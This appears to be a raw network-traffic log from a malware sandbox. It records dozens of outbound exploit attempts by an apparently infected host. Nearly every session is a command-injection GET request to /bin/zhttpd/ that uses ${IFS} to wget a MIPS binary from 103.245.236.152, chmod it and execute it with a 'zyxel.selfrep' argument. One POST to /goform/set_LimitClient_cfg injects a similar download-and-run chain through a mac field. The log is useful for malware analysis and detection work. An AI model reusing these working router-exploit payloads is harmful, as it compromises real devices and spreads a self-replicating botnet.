                                          Jan 14, 2024 15:46:14.969001055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4077192.168.2.2339458192.108.1.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.969008923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4078192.168.2.2360566164.14.205.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.969055891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4079192.168.2.2352148219.171.23.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.969069004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4080192.168.2.23458369.85.207.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.969145060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4081192.168.2.23486042.47.58.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.969202042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4082192.168.2.235875834.73.132.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.969218969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4083192.168.2.234909881.82.92.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.969250917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4084192.168.2.2355572146.100.204.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.969269037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4085192.168.2.234099023.196.237.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.969284058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4086192.168.2.2357640137.135.239.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.969321966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4087192.168.2.234428032.224.163.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.969372034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4088192.168.2.235229453.159.34.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.969400883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4089192.168.2.2346714155.52.112.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.969449043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4090192.168.2.2337102142.34.246.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.969491959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4091192.168.2.2351496116.87.177.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.969515085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4092192.168.2.2352662179.162.130.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.969547987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4093192.168.2.235109276.118.34.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.969603062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4094192.168.2.2338346121.174.113.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.969657898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4095192.168.2.2333124122.99.20.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.969674110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4096192.168.2.235850234.111.247.1328080
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.816910982 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                          Cookie: user=admin
                                          Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                          Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4097192.168.2.2358460134.193.223.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.979406118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4098192.168.2.233975683.20.134.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.979470968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4099192.168.2.233828024.43.235.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.979507923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4100192.168.2.2351994154.205.48.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.979535103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4101192.168.2.2356542144.103.40.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.979540110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4102192.168.2.235848684.95.150.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.979566097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4103192.168.2.233730090.170.89.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.979583979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4104192.168.2.234430095.44.136.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.979603052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4105192.168.2.2345548143.213.185.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.979631901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4106192.168.2.235791489.0.114.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.979696989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4107192.168.2.2358484207.31.207.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.979706049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4108192.168.2.2346014169.242.112.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.979728937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4109192.168.2.233927090.172.41.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.979783058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4110192.168.2.235244651.82.52.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.979820013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4111192.168.2.234656899.79.166.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.979824066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4112192.168.2.2355624199.41.90.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.979846001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4113192.168.2.236099886.53.6.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.979876995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4114192.168.2.2341608172.148.126.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.979901075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4115192.168.2.2336584218.126.19.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.979913950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4116192.168.2.235415224.27.204.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.979938030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4117192.168.2.2349372204.48.223.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.979949951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4118192.168.2.2349342185.213.216.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.979996920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4119192.168.2.2340368162.51.12.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980015039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4120192.168.2.2341992104.3.31.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980031967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4121192.168.2.233948459.110.14.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980070114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4122192.168.2.2336616146.41.112.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980098963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4123192.168.2.235036627.124.53.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980154037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4124192.168.2.234648017.29.217.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980175972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4125192.168.2.2353294194.7.23.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980197906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4126192.168.2.235911418.62.9.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980221033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4127192.168.2.233875667.245.101.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980246067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4128192.168.2.23370368.9.92.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980293989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4129192.168.2.2335016118.189.93.226443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980324030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4130192.168.2.234398889.138.232.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980360031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4131192.168.2.235983247.184.88.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980387926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4132192.168.2.2348956104.97.164.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980416059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4133192.168.2.234285875.190.9.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980459929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4134192.168.2.234435270.59.191.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980484009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4135192.168.2.233485844.114.242.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980510950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4136192.168.2.2354982220.54.132.143443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.980535984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4137192.168.2.233675848.170.92.249443
                                          TimestampBytes transferredDirectionData
